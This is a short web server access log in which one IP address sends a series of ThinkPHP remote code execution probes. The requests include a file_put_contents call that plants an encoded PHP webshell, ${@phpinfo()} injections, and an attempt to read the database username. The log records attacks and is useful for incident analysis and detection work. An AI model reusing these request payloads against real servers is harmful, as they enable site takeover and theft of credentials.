192.252.179.78 - - [15/Mar/2026:13:21:55 +0800] "GET /sxf.php HTTP/1.1" 404 47 "http://cqqizhou.com/sxf.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:56 +0800] "GET /index.php?s=/index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=php://filter/write=convert.base64-decode%7Cstring.rot13/resource=sxf.php&vars%5B1%5D%5B%5D=PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg== HTTP/1.1" 200 17429 "http://cqqizhou.com/index.php?s=/index/\x5Cthink\x5CContainer/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=php://filter/write=convert.base64-decode|string.rot13/resource=sxf.php&vars[1][]=PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg==" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:56 +0800] "GET /sxf.php HTTP/1.1" 404 47 "http://cqqizhou.com/sxf.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:57 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 17401 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:58 +0800] "POST / HTTP/1.1" 200 34829 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:59 +0800] "GET /index.php?s=index/%5Cthink%5Cmodule/action/param1/$%7B@phpinfo()%7D HTTP/1.1" 200 17445 "http://cqqizhou.com/index.php?s=index/\x5Cthink\x5Cmodule/action/param1/${@phpinfo()}" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X"
192.252.179.78 - - [15/Mar/2026:13:22:00 +0800] "GET /index?s=index/%5Cthink%5CModule/Action/Param/$%7B@phpinfo()%7D HTTP/1.1" 404 8983 "http://cqqizhou.com/index?s=index/\x5Cthink\x5CModule/Action/Param/${@phpinfo()}" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X"
192.252.179.78 - - [15/Mar/2026:13:22:01 +0800] "GET /index.php?s=index/think%5CError/appError&errno=1&errstr=%3C&errline=30&errfile=/a6f38dc81069b287 HTTP/1.1" 200 17423 "http://cqqizhou.com/index.php?s=index/think\x5CError/appError&errno=1&errstr=<&errline=30&errfile=/a6f38dc81069b287" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X"
192.252.179.78 - - [15/Mar/2026:13:22:02 +0800] "GET /index.php?s=index/think%5Cconfig/get&name=database.username HTTP/1.1" 301 5 "http://cqqizhou.com/index.php?s=index/think\x5Cconfig/get&name=database.username" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
36.133.115.36 - - [15/Mar/2026:13:24:49 +0800] "POST /wp-cron.php?doing_wp_cron=1773552288.9994978904724121093750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
